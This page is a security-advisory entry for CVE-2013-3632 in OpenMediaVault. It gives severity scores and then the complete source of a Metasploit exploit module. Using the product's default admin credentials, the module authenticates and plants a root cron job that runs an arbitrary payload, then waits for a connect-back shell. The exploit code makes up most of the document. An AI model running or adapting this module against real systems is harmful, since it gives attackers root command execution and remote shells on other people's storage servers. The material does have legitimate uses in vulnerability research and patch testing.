OpenMediaVault Cron Remote Command Execution

2013.10.31
Credit: Brandon Perry
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-3632
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'OpenMediaVault Cron Remote Command Execution', 'Description' => %q{ OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system. An attacker can abuse this to run arbitrary commands as any user available on the system (including root). }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module ], 'References' => [ ['CVE', '2013-3632'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats'] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 60 }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet python', } }, 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic',{}]], 'DisclosureDate' => 'Oct 30 2013', 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ false, "Password to authenticate with", 'openmediavault']) ], self.class) end def exploit init = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/index.php') }) sess = init.get_cookies post = "{\"service\":\"Authentication\",\"method\":\"login\",\"params\":{\"username\":\"#{datastore["USERNAME"]}\",\"password\":\"#{datastore["PASSWORD"]}\"}}" login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/rpc.php'), 'data' => post, 'ctype' => 'application/json', 'cookie' => sess }) if !login or login.code != 200 fail_with("Login failed") end sess = login.get_cookies post = '{"service":"Cron","method":"set","params":{"enable":true,"minute":"*","hour":"*","dayofmonth":"*","month":"*","dayofweek":"*","username":"root","command":"' post << payload.encoded.gsub('"', '\"') post << '","comment":"","type":"userdefined","everynminute":false,"everynhour":false,"everyndayofmonth":false,"sendemail":false,"uuid":"undefined"}}' resp = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/rpc.php'), 'data' => post, 'ctype' => 'application/json', 'cookie' => sess }) if !resp or resp.code != 200 fail_with("Posting cron failed.") end print_status("Waiting for connect-back, this will take up to a minute") end end

References:

https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top